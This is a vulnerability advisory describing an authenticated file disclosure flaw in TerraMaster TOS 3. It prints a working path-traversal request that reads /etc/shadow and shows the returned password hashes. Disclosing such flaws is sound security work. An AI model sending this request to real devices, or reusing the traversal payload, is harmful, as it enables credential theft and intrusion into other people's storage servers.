SSD Advisory – TerraMaster Operating System (TOS) File Disclosure

Vulnerability Summary
The following advisory describes a File Disclosure vulnerability found in TerraMaster Operating System (TOS) version 3.
TerraMaster Operating System, TOS is a Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
TerraMaster has released patches to address this vulnerability – “Tech team limit the normal user’s rights”.

Vulnerability Details
The TerraMaster Operating System is vulnerable to a file disclosure vulnerability.
The vulnerability can be found in “index.php” file. When calling it with the parameters “explorer/fileProxy&path=” any authenticated user can download any file found in the system.
Proof of Concept
An attacker that is logged in to the remote NAS, can by sending the following request download the /etc/shadow file:

GET
IPOfTheServer:Port/3.0//index.php?explorer/fileProxy&path=...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2fetc%2fshadow HTTP/1.1
Host: 127.0.0.1:8181

As can be seen below, in response, the TerraMaster Operating System will send the /etc/shadow file to the attacker:

root:$1$SgVbyjor$C7Ts4QXkjSjmHA5nSNH7x91:17220:0:99999:7:::
mysql:!:15139:0:99999:7:::
sshd:!:15139:0:99999:7:::
daemon:!:15206:0:99999:7:::
admin:$1$0/E6lWfi$qW5uGkMDFddDs3Pbt.UQyO/:17220:0:99999:7:::
rsync:$1$eCUOYuA7$T0mPjcyv6gq8CvwrNsKBX1:15278:0:99999:7:::
TimeMachine:$1$YEyZ4a58$RN4xjc0/3to9s3b0Fn4nU1:15310:0:99999:7:::
guest:$1$sEXZ4zTY$bxAsHrNEqAGtziZ5hlwLo.:15293:0:99999:7:::